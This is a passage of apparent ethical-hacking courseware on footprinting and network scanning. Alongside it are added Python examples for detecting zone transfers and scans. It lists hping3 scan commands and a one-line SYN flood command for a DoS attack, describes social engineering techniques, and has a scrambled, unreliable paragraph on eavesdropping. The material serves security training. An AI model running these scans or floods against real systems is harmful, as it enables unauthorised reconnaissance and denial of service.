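        for a, b in zip(p, p[1:]):
            adj.setdefault(a, set()).add(b)
    return {node: sorted(nbrs) for node, nbrs in adj.items()}


if __name__ == "__main__":
    traces = [path(t) for t in sorted(HOSTS)]
    for t in traces:
        print(" -> ".join(t))
    for node, nbrs in infer_topology(traces).items():
        print(f"{node} connects to {', '.join(nbrs)}")
```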
Traceroute Tools

Traceroute tools such as Path Analyzer Pro, VisualRoute, Traceroute NG, and PingPlotter are useful for extracting information about the geographical location of routers, servers, and IP devices in a network. Such tools help us to trace, identify, and monitor the network activity on a world map. Some of the features of these tools are as follows:

+ Hop-by-hop traceroutes
+ Ping plotting
+ Reverse tracing
+ Historical analysis
+ Port probing
+ Detect network problems
+ Packet loss reporting
+ Performance metrics analysis
+ Reverse DNS
+ Network performance monitoring

Path Analyzer Pro

Source: https://www.pathanalyzer.com

Path Analyzer Pro performs network route tracing with performance tests, DNS, Whois, and network resolution to investigate network issues. Attackers use Path Analyzer Pro to identify the route from the source to the destination systems graphically. As shown in the screenshot, this tool helps attackers to gather target information such as the hop number, its IP address, hostname, ASN, network name, percentage loss, latency, average latency, and standard deviation for each hop in the path.
Figure 2.71: Screenshot of Path Analyzer Pro

VisualRoute
Source: http://www.visualroute.com

VisualRoute is a traceroute and network diagnostic tool. Attackers use VisualRoute to identify the geographical location of routers, servers, and other IP devices in the target network. This tool helps attackers in tracking the path between the source and destination systems and obtaining the results in a graphical format. As shown in the screenshot, using the VisualRoute tool enables attackers to gather information such as hop number, IP address, node name, and geographical location of each hop in the route.
Figure 2.72: Screenshot of VisualRoute
Footprinting through Social Engineering
So far, we have discussed the different techniques for gathering information using online resources or tools. Now, we will discuss footprinting through social engineering, i.e., the art of obtaining information from people by exploiting their weaknesses. This section covers the concept as well as the techniques used to gather information through social engineering.

Social engineering is a non-technical process in which an attacker misleads a person into providing confidential information inadvertently. In other words, the target is unaware of the fact that someone is stealing confidential information. The attacker takes advantage of the gullible nature of people and their willingness to provide confidential information.

To perform social engineering, an attacker first needs to gain the confidence of an authorized user and then mislead that user into revealing confidential information. The goal of social engineering is to obtain the required confidential information and then use that information for malicious purposes such as gaining unauthorized access to the system, identity theft, industrial espionage, network intrusion, fraud, and so on. The information obtained through social engineering may include credit card details, social security numbers, usernames and passwords, other personal information, security products in use, OS and software versions, IP addresses, names of servers, network layout information, and so on.

Social engineering can be performed in many ways, such as eavesdropping, shoulder surfing, dumpster diving, tailgating, impersonation, third-party authorization, piggybacking, reverse social engineering, and so on.
Collecting Information Using Eavesdropping, Shoulder Surfing, Dumpster Diving, and Impersonation

Eavesdropping, shoulder surfing, dumpster diving, and impersonation are social engineering techniques that are widely used to collect information from people.
Eavesdropping
Eavesdropping of
or isthe
act
videoconferencesecretly
listening
their
without of a
reading
to the conversations
consent.It alsoincludes
fromcommunication media,suchas instant messaging
people over phone
confidentialmessages
or faxtransmissions.It is the act
of interceptingcommunication i n any form suchas audio, video,or text without the
consent ofthe communicating
conversations or attacker
gains
parties.
audio,
intercepting
The
video,or
information
written communication.
bytapping phone
Shoulder Surfing

Shoulder surfing is a technique whereby attackers secretly observe the target to gain critical information. In the shoulder surfing technique, an attacker stands behind the victim and secretly observes the victim's activities on the computer, such as keystrokes while entering usernames, passwords, and so on. The technique is effective in gaining passwords, personal identification numbers, security codes, account numbers, credit card information, and similar data. Attackers can easily perform shoulder surfing in a crowded place, as it is relatively easy to stand behind and watch the victim without his or her knowledge.
Dumpster Diving

This uncouth technique, also known as trashing, involves the attacker rummaging for information in garbage bins. The attacker may gain vital information such as phone bills, contact information, financial information, operations-related information, printouts of source codes, printouts of sensitive information, and so on from the target company's trash bins, printer waste bins, sticky notes at users' desks, and so on. The attacker may also gather account information from ATM trash bins. The information can help the attacker to commit attacks.
Impersonation

Impersonation is a technique whereby an attacker pretends to be a legitimate or authorized person. Attackers perform impersonation attacks personally or use phones or other communication media to mislead targets and trick them into revealing information. The attacker might impersonate a courier/delivery person, janitor, businessman, client, or technician, or he/she may pretend to be a visitor. Using this technique, an attacker gathers sensitive information by scanning terminals for passwords, searching important documents on desks, rummaging bins, and so on. The attacker may even try to overhear confidential conversations and "shoulder surf" to obtain sensitive information.
Footprinting Tools
Various tools help attackers in footprinting. Many organizations offer tools that make information gathering an easy task. This section describes tools intended for obtaining information from various sources.

Footprinting tools are used to collect basic information about target systems to exploit them. Information collected by the footprinting tools includes the target's IP location information, routing information, business information, address, phone number and social security number, details about the source of an email and a file, DNS information, domain information, and so on.

Maltego

Source: https://www.paterva.com

Maltego is a program that can be used to determine the relationships and real-world links between people, groups of people, organizations, websites, Internet infrastructure, documents, etc.

Figure 2.73: Screenshot of Maltego
Recon-ng

Source: https://github.com

Recon-ng is a web reconnaissance framework with independent modules for database interaction that provides an environment in which open-source web-based reconnaissance can be conducted. As shown in the screenshot, attackers use the module recon/domains-hosts/hackertarget to extract a list of subdomains and IP addresses associated with the target URL. Attackers use this module to gather target information.

Figure 2.74: Screenshot of recon-ng

FOCA
Source: https://www.elevenpaths.com

Fingerprinting Organizations with Collected Archives (FOCA) is a tool used mainly to find metadata and hidden information in the documents that it scans. FOCA is capable of scanning and analyzing a wide variety of documents, with the most common ones being Microsoft Office, OpenOffice, or PDF files.
Features:

+ Web Search - Searches for hosts and domain names through URLs associated with the main domain. Each link is analyzed to extract information from its new host and domain names.
+ DNS Search - Checks each domain to ascertain the hostnames configured in NS, MX, and SPF servers to discover the new host and domain names.
+ IP Resolution - Resolves each discovered host name to its IP address.
+ PTR Scanning - Finds more servers in the same segment of a determined address; FOCA executes a PTR log scan.
+ Bing IP - Launches attacks against the DNS.
As shown in the screenshot, attackers search the target domain and obtain the file information stored in it. The extracted files can be viewed on the web browser. Further, the attackers can view additional information such as network domains, roles, vulnerabilities, and metadata of the target domain.

Figure 2.75: Screenshot of FOCA
OSRFramework

Source: https://github.com

OSRFramework includes applications related to username checking, DNS lookups, information leaks research, deep web search, and regular expression extraction. The tools included in the OSRFramework package that attackers can use to gather information on the target are listed below:

+ usufy.py - Checks for the existence of a profile for a given user on different platforms
+ searchfy.py - Performs a query on the platforms in OSRFramework
+ domainfy.py - Checks for the existence of domains
+ phonefy.py - Checks for the existence of a given series of phone numbers
+ entify.py - Uses regular expressions to extract entities

As shown in the screenshot, attackers use the following command to search for a target user on social media platforms:

usufy.py -n Mark Zuckerberg -p twitter facebook youtube

Figure 2.76: Screenshot of OSRFramework
OSINT Framework

Source: https://osintframework.com

OSINT Framework is an open source intelligence gathering framework that helps security professionals in performing automated footprinting and reconnaissance, OSINT research, and intelligence gathering. It is focused on gathering information from free tools or resources. This framework includes a simple web interface that lists various OSINT tools arranged by category, and it is shown as an OSINT tree structure on the web interface. As shown in the screenshot, the tools listed include the following indicators:

+ (T) - Indicates a link to a tool that must be installed and run locally
+ (D) - Google dork
+ (R) - Requires registration
+ (M) - Indicates a URL that contains the search term and the URL itself must be edited manually

Recon-Dog

Source: https://www.github.com

Recon-Dog is an all-in-one tool for all basic information gathering needs. It uses APIs to collect information about the target system.
Features:

+ Censys: Uses censys.io to gather a massive amount of information about an IP address
+ NS lookup: Performs name server lookup
+ Port scan: Scans the most common TCP ports
+ Detect CMS: Can detect 400+ content management systems
+ Whois lookup: Performs a Whois lookup
+ Detect honeypot: Uses shodan.io to check if the target is a honeypot
+ Find subdomains: Uses findsubdomains.com to find subdomains
+ Reverse IP lookup: Performs a reverse IP lookup to find domains associated with an IP address
+ Detect technologies: Uses wappalyzer.com to detect 1000+ technologies
+ All: Runs all utilities against the target

Figure 2.78: Screenshot of Recon-Dog
BillCipher

Source: https://www.github.com

BillCipher is an information gathering tool for a website or IP address. It can work on any operating system that supports Python 2, Python 3, and Ruby. This tool includes various options such as DNS lookup, Whois lookup, port scanning, zone transfer, host finder, and reverse IP lookup, which help to gather critical information.

Figure 2.79: Screenshot of BillCipher

Some additional footprinting tools are listed below:

+ theHarvester (http://www.edge-security.com)
+ Th3inspector (https://github.com)
+ Raccoon (https://github.com)
+ Orb (https://github.com)
+ PENTMENU (https://github.com)
Footprinting Countermeasures
So far, we have discussed the importance of footprinting, various ways to perform the task, and the tools that help in its execution. Now, we will discuss footprinting countermeasures, i.e., the measures or actions taken to prevent or offset information disclosure. Some of the footprinting countermeasures are as follows:

+ Restrict the employees' access to social networking sites from the organization's network
+ Configure web servers to avoid information leakage
+ Educate employees to use pseudonyms on blogs, groups, and forums
+ Do not reveal critical information in press releases, annual reports, product catalogs, and so on
+ Prevent search engines from caching a web page and use anonymous registration services
+ Develop and enforce security policies such as information security policy, password policy, and so on, to regulate the information that employees can reveal to third parties
+ Set apart internal and external DNS or use split DNS, and restrict zone transfer to authorized servers
+ Disable directory listings in the web servers
+ Conduct security awareness training periodically to educate employees about various social engineering tricks and risks
+ Opt for privacy services on the Whois lookup database
+ Avoid domain-level cross-linking for critical assets
+ Encrypt and password-protect sensitive information
+ Do not enable protocols that are not required
+ Always use TCP/IP and IPSec filters for defense in depth
+ Configure IIS to avoid information disclosure through banner grabbing
+ Hide the IP address and the related information by implementing a VPN or keeping the server behind a secure proxy
+ Request archive.org to delete the history of the website from the archive database
+ Keep the domain name profile private
+ Place critical documents such as business plans and proprietary documents offline to prevent exploitation
+ Train employees to thwart social engineering techniques and attacks
+ Sanitize the details provided to the Internet registrars to hide the direct contact details of the organization
+ Disable the geo-tagging functionality on cameras to prevent geolocation tracking
+ Avoid revealing one's location or travel plans on social networking sites
+ Turn off geolocation access on all mobile devices when not required
+ Ensure that no critical information such as strategic plans, product information, and sales projections is displayed on notice boards or walls
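The countermeasure of restricting zone transfers to authorized servers pairs naturally with detection: the DNS interrogation section earlier noted that an open zone transfer hands an attacker the whole zone. This added example (not from the courseware) scans query-log lines for AXFR/IXFR requests from clients that are not listed secondaries; the log lines are constructed to approximate BIND's query-log format, and the zone name, the authorized secondary 192.0.2.53 and the client addresses are placeholders.

```python
"""Detect zone transfer requests from hosts that are not authorized secondaries.

Added example, not from the CEH courseware. The log lines are constructed to
approximate BIND's query-log format; zone, secondary and client addresses
are placeholders.
"""
import re

# Secondaries allowed to pull each zone (the "authorized servers" of the countermeasure).
AUTHORIZED_SECONDARIES = {"example.com": {"192.0.2.53"}}

# Constructed sample, approximating BIND query-log lines (not real logs).
SAMPLE_LOG = """\
28-Oct-2020 10:01:02.001 queries: info: client 192.0.2.53#53211 (example.com): query: example.com IN AXFR +E (192.0.2.1)
28-Oct-2020 10:01:05.113 queries: info: client 198.51.100.77#41822 (www.example.com): query: www.example.com IN A +E (192.0.2.1)
28-Oct-2020 10:02:17.448 queries: info: client 203.0.113.9#60442 (example.com): query: example.com IN AXFR +E (192.0.2.1)
28-Oct-2020 10:02:19.002 queries: info: client 203.0.113.9#60443 (example.com): query: example.com IN IXFR +E (192.0.2.1)
"""

# client <ip>#<port> (<name>): query: <name> IN <type>
QUERY_RE = re.compile(
    r"client (?P<ip>\d{1,3}(?:\.\d{1,3}){3})#\d+ \([^)]*\): "
    r"query: (?P<name>\S+) IN (?P<qtype>[A-Z]+)"
)


def parse_queries(text):
    """Yield (client_ip, query_name, query_type) for every query line."""
    for line in text.splitlines():
        m = QUERY_RE.search(line)
        if m:
            yield m.group("ip"), m.group("name").rstrip(".").lower(), m.group("qtype")


def unauthorized_transfers(text, allowed=AUTHORIZED_SECONDARIES):
    """Transfer requests (AXFR or IXFR) from clients not listed for that zone."""
    findings = []
    for ip, name, qtype in parse_queries(text):
        if qtype in ("AXFR", "IXFR") and ip not in allowed.get(name, set()):
            findings.append((ip, name, qtype))
    return findings


if __name__ == "__main__":
    for ip, zone, qtype in unauthorized_transfers(SAMPLE_LOG):
        print(f"{qtype} of {zone} requested by {ip}, which is not an authorized secondary")
```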
Module Summary

This module presented footprinting concepts along with the objectives of footprinting. It provided a detailed explanation of the various techniques used for footprinting through search engines. Further, it described footprinting through web services and social networking sites. In addition, it discussed website and email footprinting techniques. It also explained Whois and DNS footprinting in detail. Moreover, it described network footprinting along with traceroute analysis. It also explained footprinting through social engineering. Finally, it presented an overview of important footprinting tools. The module ended with a detailed discussion of how organizations can defend themselves against footprinting and reconnaissance activities.

In the next module, we will discuss in detail how attackers as well as ethical hackers and pen testers perform network scanning to collect information about a target for evaluation before an attack or audit.
Module 03: Scanning Networks

Module Objectives

After identifying the target and performing the initial reconnaissance, as discussed in the Footprinting and Reconnaissance module, attackers begin to search for an entry point into the target system. Attackers should determine whether the target systems are active or inactive to reduce the time spent on scanning. Notably, the scanning itself is not the actual intrusion but an extended form of reconnaissance in which the attacker learns more about his/her target, including information about OSs, services, and any configuration lapses. The information gleaned from such reconnaissance helps the attacker select strategies for attacking the target system or network.

At the end of this module, you will be able to:

+ Describe the network scanning concepts
+ Use various scanning tools
+ Perform host discovery to check for live systems
+ Perform port and service discovery using various scanning techniques
+ Scan beyond intrusion detection systems (IDS) and firewalls
+ Perform operating system (OS) discovery
+ Draw network diagrams using network discovery tools
Network Scanning Concepts

As already discussed, footprinting is the first phase of hacking, in which the attacker gains primary information about a potential target. He/she then uses this information in the scanning phase to gather more details about the target.
Overview of Network Scanning

Network scanning refers to a set of procedures used for identifying hosts, ports, and services in a network. Network scanning is one of the components of intelligence gathering which can be used by an attacker to create a profile of the target organization.

Network Scanning Process: the attacker sends TCP/IP probes to the target network and gets network information back.

In the process of scanning, the attacker tries to gather information, including the specific IP addresses that can be accessed over the network, the target's OS and system architecture, and the ports along with their respective services running on each computer. It is one of the most important phases of intelligence gathering for an attacker, which enables him/her to create a profile of the target organization.
Types of Scanning

+ Port Scanning - Lists the open ports and services. Port scanning is the process of checking the services running on the target computer by sending a sequence of messages in an attempt to break in. Port scanning involves connecting to the ports of the target system to determine their state, such as the listening state.
+ Vulnerability Scanning - Vulnerability scanning is a method for checking whether a system is exploitable by identifying its vulnerabilities. A vulnerability scanner consists of a scanning engine and a catalog. The catalog includes a list of common files with known vulnerabilities and common exploits to scan for; these are configurations that can be fixed easily through updated security patches and a clean web document.

A thief who wants to break into a house looks for access points such as doors and windows. These are usually the house's points of vulnerability, as they are easily accessible. When it comes to computer systems and networks, ports are the doors and windows of a system that an intruder uses to gain access. A general rule for computer systems is that the greater the number of open ports on a system, the more vulnerable the system is. However, there are cases in which a system with fewer open ports than another machine presents a much higher level of vulnerability.
Objectives of Network Scanning

The more the information at hand about a target organization, the higher are the chances of knowing a network's security loopholes and, consequently, of gaining unauthorized access to it. Some objectives for scanning a network are as follows:

+ Discover the network's live hosts, IP addresses, and open ports of the live hosts. Using the open ports, the attacker will determine the best means of entering into the system.
+ Discover the OS and system architecture of the target. This is also known as fingerprinting. An attacker can formulate an attack strategy based on the OS's vulnerabilities.
+ Discover the services running/listening on the target system. Doing so gives the attacker an indication of the vulnerabilities (based on the service) that can be exploited for gaining access to the target system.
+ Identify specific applications or versions of a particular service.
+ Identify vulnerabilities in any of the network systems. This helps an attacker to compromise the target system or network through various exploits.
TCP Communication Flags

The TCP header contains various flags that control the transmission of data across a TCP connection. Six TCP control flags manage the connection between hosts and give instructions to the system. Four of these flags (SYN, ACK, FIN, and RST) govern the establishment, maintenance, and termination of a connection. The other two flags (PSH and URG) provide instructions to the system. The size of each flag is 1 bit. As there are six flags in the TCP Flags section, the size of this section is 6 bits. When a flag value is set to "1," that flag is automatically turned on.

Figure 3.2: TCP header format
TePFlags
Figure3.3:
TCPcommuniaton fags
The following are the TCP communication flags:

- Synchronize or "SYN": It notifies the transmission of a new sequence number. This flag generally represents the establishment of a connection (three-way handshake) between two hosts.
- Acknowledgement or "ACK": It confirms the receipt of the transmission and identifies the next expected sequence number. When the system successfully receives a packet, it sets the value of its flag to "1," thus implying that the receiver should pay attention to it.
- Push or "PSH": When it is set to "1," it indicates that the sender has raised the push operation to the receiver; this implies that the remote system should inform the receiving application about the buffered data coming from the sender. The system raises the PSH flag at the start and end of data transfer and sets it on the last segment of a file to prevent buffer deadlocks.
- Urgent or "URG": It instructs the system to process the data contained in packets as soon as possible. When the system sets the flag to "1," priority is given to processing the urgent data first and all the other data processing is stopped.
- Finish or "FIN": It is set to "1" to announce that no more transmissions will be sent to the remote system and the connection established by the SYN flag is terminated.
- Reset or "RST": When there is an error in the current connection, this flag is set to "1" and the connection is aborted in response to the error. Attackers use this flag to scan hosts and identify open ports.

SYN scanning mainly deals with three flags: SYN, ACK, and RST. You can use these three flags for gathering illegal information from servers during enumeration.
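The flag layout described above, as an added example that is not part of the EC-Council courseware: a small Python parser that unpacks the fixed 20-byte TCP header, decodes the six control flags from byte 13, and labels each flag combination the way the handshake and the probe types named in this module (SYN, FIN, NULL, Xmas) use them. The sample headers are constructed here; the port numbers, sequence numbers and helper names are my choices, not values from the page, and the checksum is left at zero because nothing is transmitted.

```python
import struct

# The six control flags described above, as bit masks over the low six bits
# of byte 13 of the TCP header (FIN is the least-significant bit).
TCP_FLAGS = {
    "URG": 0x20,
    "ACK": 0x10,
    "PSH": 0x08,
    "RST": 0x04,
    "SYN": 0x02,
    "FIN": 0x01,
}


def build_tcp_header(sport, dport, seq, ack, flag_names, window=8192):
    """Construct the fixed 20-byte TCP header with the given flags set.

    The checksum is left at zero: these are offline sample headers for
    parsing practice, not segments to be transmitted.
    """
    flag_bits = 0
    for name in flag_names:
        flag_bits |= TCP_FLAGS[name]
    data_offset = 5 << 4  # five 32-bit words (20 bytes), no options
    return struct.pack("!HHIIBBHHH", sport, dport, seq, ack,
                       data_offset, flag_bits, window, 0, 0)


def parse_tcp_header(raw):
    """Parse the fixed part of a TCP header and return its fields as a dict,
    with the control flags decoded into a set of names."""
    if len(raw) < 20:
        raise ValueError("a TCP header is at least 20 bytes long")
    (sport, dport, seq, ack, off_res, flags,
     window, checksum, urg_ptr) = struct.unpack("!HHIIBBHHH", raw[:20])
    return {
        "src_port": sport,
        "dst_port": dport,
        "seq": seq,
        "ack": ack,
        "header_len": (off_res >> 4) * 4,   # data offset is in 32-bit words
        "window": window,
        "urg_ptr": urg_ptr,
        "flags": {name for name, bit in TCP_FLAGS.items() if flags & bit},
    }


def classify_segment(flags):
    """Name a segment by its flag combination. Combinations that a conforming
    stack never emits on its own (no flags, SYN together with FIN, FIN without
    ACK, FIN+PSH+URG) are labelled as probes, since on a monitored network
    they only appear when someone is scanning."""
    if not flags:
        return "NULL probe (no flags set)"
    if {"FIN", "PSH", "URG"} <= flags and "ACK" not in flags:
        return "Xmas probe (FIN+PSH+URG)"
    if "SYN" in flags and "FIN" in flags:
        return "invalid (SYN+FIN)"
    if flags == {"SYN"}:
        return "SYN (handshake step 1)"
    if flags == {"SYN", "ACK"}:
        return "SYN/ACK (handshake step 2)"
    if "RST" in flags:
        return "RST (connection aborted)"
    if "FIN" in flags and "ACK" not in flags:
        return "FIN probe (FIN without ACK)"
    if "FIN" in flags:
        return "FIN/ACK (orderly close)"
    if "ACK" in flags:
        return "ACK (established data/ack or ACK probe)"
    return "unusual (" + "+".join(sorted(flags)) + ")"


# Constructed sample headers (not captured traffic): the opener of a
# handshake towards port 21, and a FIN+PSH+URG probe aimed at port 80.
SAMPLES = {
    "handshake_syn": build_tcp_header(40000, 21, 1000, 0, {"SYN"}),
    "xmas_probe": build_tcp_header(40001, 80, 0, 0, {"FIN", "PSH", "URG"}),
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        hdr = parse_tcp_header(raw)
        print(label, hdr["dst_port"], sorted(hdr["flags"]),
              "->", classify_segment(hdr["flags"]))
```

The classifier only looks at the six flags the text describes; the two ECN bits above them in byte 13 are masked off by the flag table, which is what you want when the goal is to spot flag combinations that no normal client produces.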
TCP/IP Communication
TCP is connection oriented, i.e., it prioritizes connection establishment before data transfer between applications. This connection between protocols is possible through the three-way handshake.

A TCP session initiates using a three-way handshake mechanism:

- To launch a TCP connection, the source (10.0.0.2:21) sends a SYN packet to the destination (10.0.0.3:21).
- On receiving the SYN packet, the destination responds by sending a SYN/ACK packet back to the source. The ACK packet confirms the arrival of the first SYN packet to the source.
- Finally, the source sends an ACK packet for the ACK/SYN packet transmitted by the destination.

This triggers an "OPEN" connection, thereby allowing communication between the source and destination, which continues until one of them issues a "FIN" or "RST" packet to close the connection.
Figure 3.4: TCP session establishment

This mechanism is used throughout the Internet and works similarly to ordinary telephone communication, in which one picks up a telephone receiver, hears a dial tone, and dials a number that triggers ringing at the other end until someone picks up the receiver and says, "Hello."
The system terminates the established TCP session as follows: After completing all the data transfers through the established TCP connection, the sender sends the connection termination request to the receiver through a FIN or RST packet. Upon receiving the connection termination request, the receiver acknowledges the termination request by sending an ACK packet to the sender and finally sends its own FIN packet. Then, the system terminates the established connection.
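The three-way handshake and the FIN/RST termination described above, replayed as an added example (not EC-Council's code): a minimal session tracker that walks constructed segment events through the states the text names and then reports, per initiating host, the sessions that received a SYN/ACK but were never completed or were torn down with RST instead of FIN, which is what a monitored host sees on its side of a SYN scan. The event tuples, the ephemeral source ports (the page's own example uses 10.0.0.2:21 to 10.0.0.3:21), the probing host 10.0.0.9 and the reporting threshold are assumptions constructed for illustration.

```python
from collections import defaultdict


def track_sessions(events):
    """Replay (src, dst, flags) events in time order and return the final
    state of every session, keyed by (initiator, responder) "ip:port" strings.

    The transitions follow the steps described above:
      SYN             -> SYN_SENT       (step 1, opens a new session)
      SYN/ACK         -> SYN_RECEIVED   (step 2)
      ACK             -> ESTABLISHED    (step 3)
      FIN from a side -> FIN_WAIT; the other side's FIN -> CLOSED
      RST at any time -> RESET
    Segments for sessions that never started with a SYN are ignored.
    """
    sessions = {}
    for src, dst, flags in events:
        flags = set(flags)
        if flags == {"SYN"}:
            sessions[(src, dst)] = "SYN_SENT"
            continue
        key = (src, dst) if (src, dst) in sessions else (dst, src)
        if key not in sessions:
            continue
        state = sessions[key]
        if "RST" in flags:
            sessions[key] = "RESET"
        elif flags == {"SYN", "ACK"} and state == "SYN_SENT":
            sessions[key] = "SYN_RECEIVED"
        elif "FIN" in flags:
            sessions[key] = "CLOSED" if state == "FIN_WAIT" else "FIN_WAIT"
        elif "ACK" in flags and state == "SYN_RECEIVED":
            sessions[key] = "ESTABLISHED"
    return sessions


def incomplete_session_report(sessions, threshold=3):
    """Per initiating host, collect the responder ports of sessions that were
    answered with SYN/ACK but never completed (still SYN_RECEIVED) or were
    torn down with RST instead of FIN. A host with more than `threshold`
    such ports is reported: this is the trace a SYN scan or SYN ping sweep
    leaves, while ord clients finish their handshakes and close with FIN.
    It is a heuristic; a single crashed client also ends in RESET."""
    ports_by_host = defaultdict(set)
    for (initiator, responder), state in sessions.items():
        if state in ("SYN_RECEIVED", "RESET"):
            host = initiator.rsplit(":", 1)[0]
            port = responder.rsplit(":", 1)[1]
            ports_by_host[host].add(port)
    return {host: sorted(ports, key=int)
            for host, ports in ports_by_host.items() if len(ports) > threshold}


# Constructed sample (not captured traffic): one complete session between
# 10.0.0.2 and 10.0.0.3:21 as in the handshake above, followed by 10.0.0.9
# opening four ports on 10.0.0.3 and tearing each down with RST.
SAMPLE_EVENTS = [
    ("10.0.0.2:40000", "10.0.0.3:21", {"SYN"}),
    ("10.0.0.3:21", "10.0.0.2:40000", {"SYN", "ACK"}),
    ("10.0.0.2:40000", "10.0.0.3:21", {"ACK"}),
    ("10.0.0.2:40000", "10.0.0.3:21", {"FIN", "ACK"}),   # sender requests close
    ("10.0.0.3:21", "10.0.0.2:40000", {"ACK"}),          # receiver acknowledges
    ("10.0.0.3:21", "10.0.0.2:40000", {"FIN", "ACK"}),   # receiver's own FIN
    ("10.0.0.2:40000", "10.0.0.3:21", {"ACK"}),
]
for i, port in enumerate((22, 23, 25, 80)):
    probe, target = f"10.0.0.9:{50000 + i}", f"10.0.0.3:{port}"
    SAMPLE_EVENTS += [
        (probe, target, {"SYN"}),
        (target, probe, {"SYN", "ACK"}),
        (probe, target, {"RST"}),
    ]

if __name__ == "__main__":
    final = track_sessions(SAMPLE_EVENTS)
    for key, state in final.items():
        print(key, state)
    print(incomplete_session_report(final))
```

The tracker keys each session by the side that sent the first SYN, so the responder's SYN/ACK and FIN are matched back to the same entry regardless of direction; a real monitor would also age out entries and count data segments, which this example omits.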
Figure 3.5: TCP session termination
Module Flow: Scanning Tools, Port and Service Discovery, OS Discovery (Banner Grabbing/OS Fingerprinting), Scanning Beyond IDS and Firewall

Scanning Tools
Scanning tools are used to scan and identify live hosts, open ports, running services on a target network, location info, NetBIOS info, and information about all TCP/IP and UDP open ports. The information obtained from these tools will help an ethical hacker in creating the profile of the target organization and scanning the network for open ports of the devices connected.

- Nmap
Source: https://nmap.org

Nmap ("Network Mapper") is a security scanner for network exploration and hacking. It allows you to discover hosts, ports, and services on a computer network, thus creating a "map" of the network. It sends specially crafted packets to the target host and then analyzes the responses to accomplish its goal. It scans vast networks of literally hundreds of thousands of machines. Nmap includes many mechanisms for port scanning (TCP and UDP), OS detection, version detection, ping sweeps, and so on.
Figure 3.6: Screenshot displaying Nmap scan

Figure 3.7: Screenshot displaying Nmap scan result (obtains a list of open ports, OS details, MAC details, and services along with their versions)

- Hping2/Hping3
Source: http://www.hping.org

Hping2/Hping3 is a command-line-oriented network scanning and packet crafting tool for the TCP/IP protocol that sends ICMP echo requests and supports TCP, UDP, ICMP, and raw-IP protocols. It performs network security auditing, firewall testing, manual path MTU discovery, advanced traceroute, remote OS fingerprinting, remote uptime guessing, TCP/IP stacks auditing, and other functions. It can send custom TCP/IP packets and display target replies similarly to a ping program with ICMP replies. It handles fragmentation as well as arbitrary packet body and size, and it can be used to transfer encapsulated files under the supported protocols. It also supports idle host scanning. IP spoofing and network/host scanning can be used to perform an anonymous probe for services.

Hping2/Hping3 also has a Traceroute mode, which enables attackers to send files between covert channels. It also determines whether the host is up even when the host blocks ICMP packets. Its firewalk-like usage allows the discovery of open ports behind firewalls. It performs manual path MTU discovery and enables attackers to perform remote OS fingerprinting. Using Hping, an attacker can study the behavior of an idle host and gain information about the target, such as the services that the host offers, the ports supporting the services, and the OS of the target. This type of scan is a predecessor to either heavier probing or outright attacks.
Figure 3.8: ICMP scanning

The OS, router, switch, and IP-based devices use this protocol via the ping command for echo request and echo response as a connectivity tester between different hosts.
ACK Scanning on Port 80

This scanning technique can be used to probe the existence of a firewall and its rule sets. Simple packet filtering allows the establishment of a connection (packets with the ACK bit set), whereas a sophisticated stateful firewall does not allow the establishment of a connection.

Figure 3.9: ACK scanning on port 80

Hping Commands
The various Hping commands are as follows:

- ICMP ping
Ex. hping3 -1 10.0.0.25
Hping performs an ICMP ping scan by specifying the argument -1 in the command line. You may use --ICMP or -1 as the argument in the command line. By issuing the above command, Hping sends an ICMP echo request to 10.0.0.25 and receives an ICMP reply similarly to a ping utility.

- ACK scan on port 80
Ex. hping3 -A 10.0.0.25 -p 80
Hping can be configured to perform an ACK scan by specifying the argument -A in the command line. Here, you set the ACK flag in the probe packets and perform the scan. You perform this scan when a host does not respond to a ping request. By issuing this command, Hping checks if a host is alive on a network. If it finds a live host and an open port, it returns an RST response.

- UDP scan on port 80
Ex. hping3 -2 10.0.0.25 -p 80
Hping uses TCP as its default protocol. Using the argument -2 in the command line specifies that Hping operates in the UDP mode. You may use either --udp or -2 as the argument in the command line. By issuing the above command, Hping sends UDP packets to port 80 on the host (10.0.0.25). It returns an ICMP port unreachable message if it finds the port closed and does not return a message if the port is open.

- Collecting Initial Sequence Number
Ex. hping3 192.168.1.103 -Q -p 139 -s
Using the argument -Q in the command line, Hping collects all the TCP sequence numbers generated by the target host (192.168.1.103).

- Firewalls and Timestamps
Ex. hping3 -S 72.14.207.99 -p 80 --tcp-timestamp
Many firewalls drop those TCP packets that do not have the TCP Timestamp option set. By adding the --tcp-timestamp argument in the command line, you can enable the TCP timestamp option in Hping and try to guess the timestamp update frequency and uptime of the target host (72.14.207.99).

- SYN scan on port 50-60
Ex. hping3 -8 50-60 -S 10.0.0.25 -V
Using the argument -8 or --scan in the command line, you are operating Hping in the scan mode to scan a range of ports on the target host. Adding the argument -S allows you to perform a SYN scan. Therefore, the above command performs a SYN scan on ports 50-60 on the target host.

- FIN, PUSH, and URG scan on port 80
Ex. hping3 -F -P -U 10.0.0.25 -p 80
By adding the arguments -F, -P, and -U in the command line, you are setting the FIN, PUSH, and URG flags in the probe packets. By issuing this command, you are performing FIN, PUSH, and URG scans on port 80 on the target host (10.0.0.25). If port 80 is open, you will not receive a response. If the port is closed, Hping will return an RST response.

- Scan entire subnet for live host
Ex. hping3 -1 10.0.1.x --rand-dest -I eth0
By issuing this command, Hping performs an ICMP ping scan on the entire subnet 10.0.1.x; in other words, it sends an ICMP echo request randomly (--rand-dest) to all the hosts from 10.0.1.0 to 10.0.1.255 that are connected to the interface eth0. The hosts whose ports are open will respond with an ICMP reply. In this case, you have not set a port; hence, Hping sends packets to port 0 on all IP addresses by default.

- Intercept all traffic containing HTTP signature
Ex. hping3 -9 HTTP -I eth0
The argument -9 will set Hping to the listen mode. Hence, by issuing the command -9 HTTP, Hping starts listening on port 0 (of all the devices connected in the network to interface eth0), intercepts all the packets containing the HTTP signature, and dumps from the signature end to the packet's end. For example, on issuing the command hping2 -9 HTTP, if Hping reads a packet that contains data 234-09sd#1k}s45-HTTPhello_world, it will display the result as hello_world.

- SYN flooding a victim
Ex. hping3 -S 192.168.1.1 -a 192.168.1.254
This is used to perform a DoS attack.

The following table lists the various scanning methods and their respective Hping commands:

Scan                                              Commands
ACK scan on port 80                               hping3 -A 10.0.0.25 -p 80
UDP scan on port 80                               hping3 -2 10.0.0.25 -p 80
Collecting initial sequence number                hping3 192.168.1.103 -Q -p 139 -s
SYN scan on port 50-60                            hping3 -8 50-60 -S 10.0.0.25 -V
FIN, PUSH, and URG scan on port 80                hping3 -F -P -U 10.0.0.25 -p 80
Scan entire subnet for live host                  hping3 -1 10.0.1.x --rand-dest -I eth0
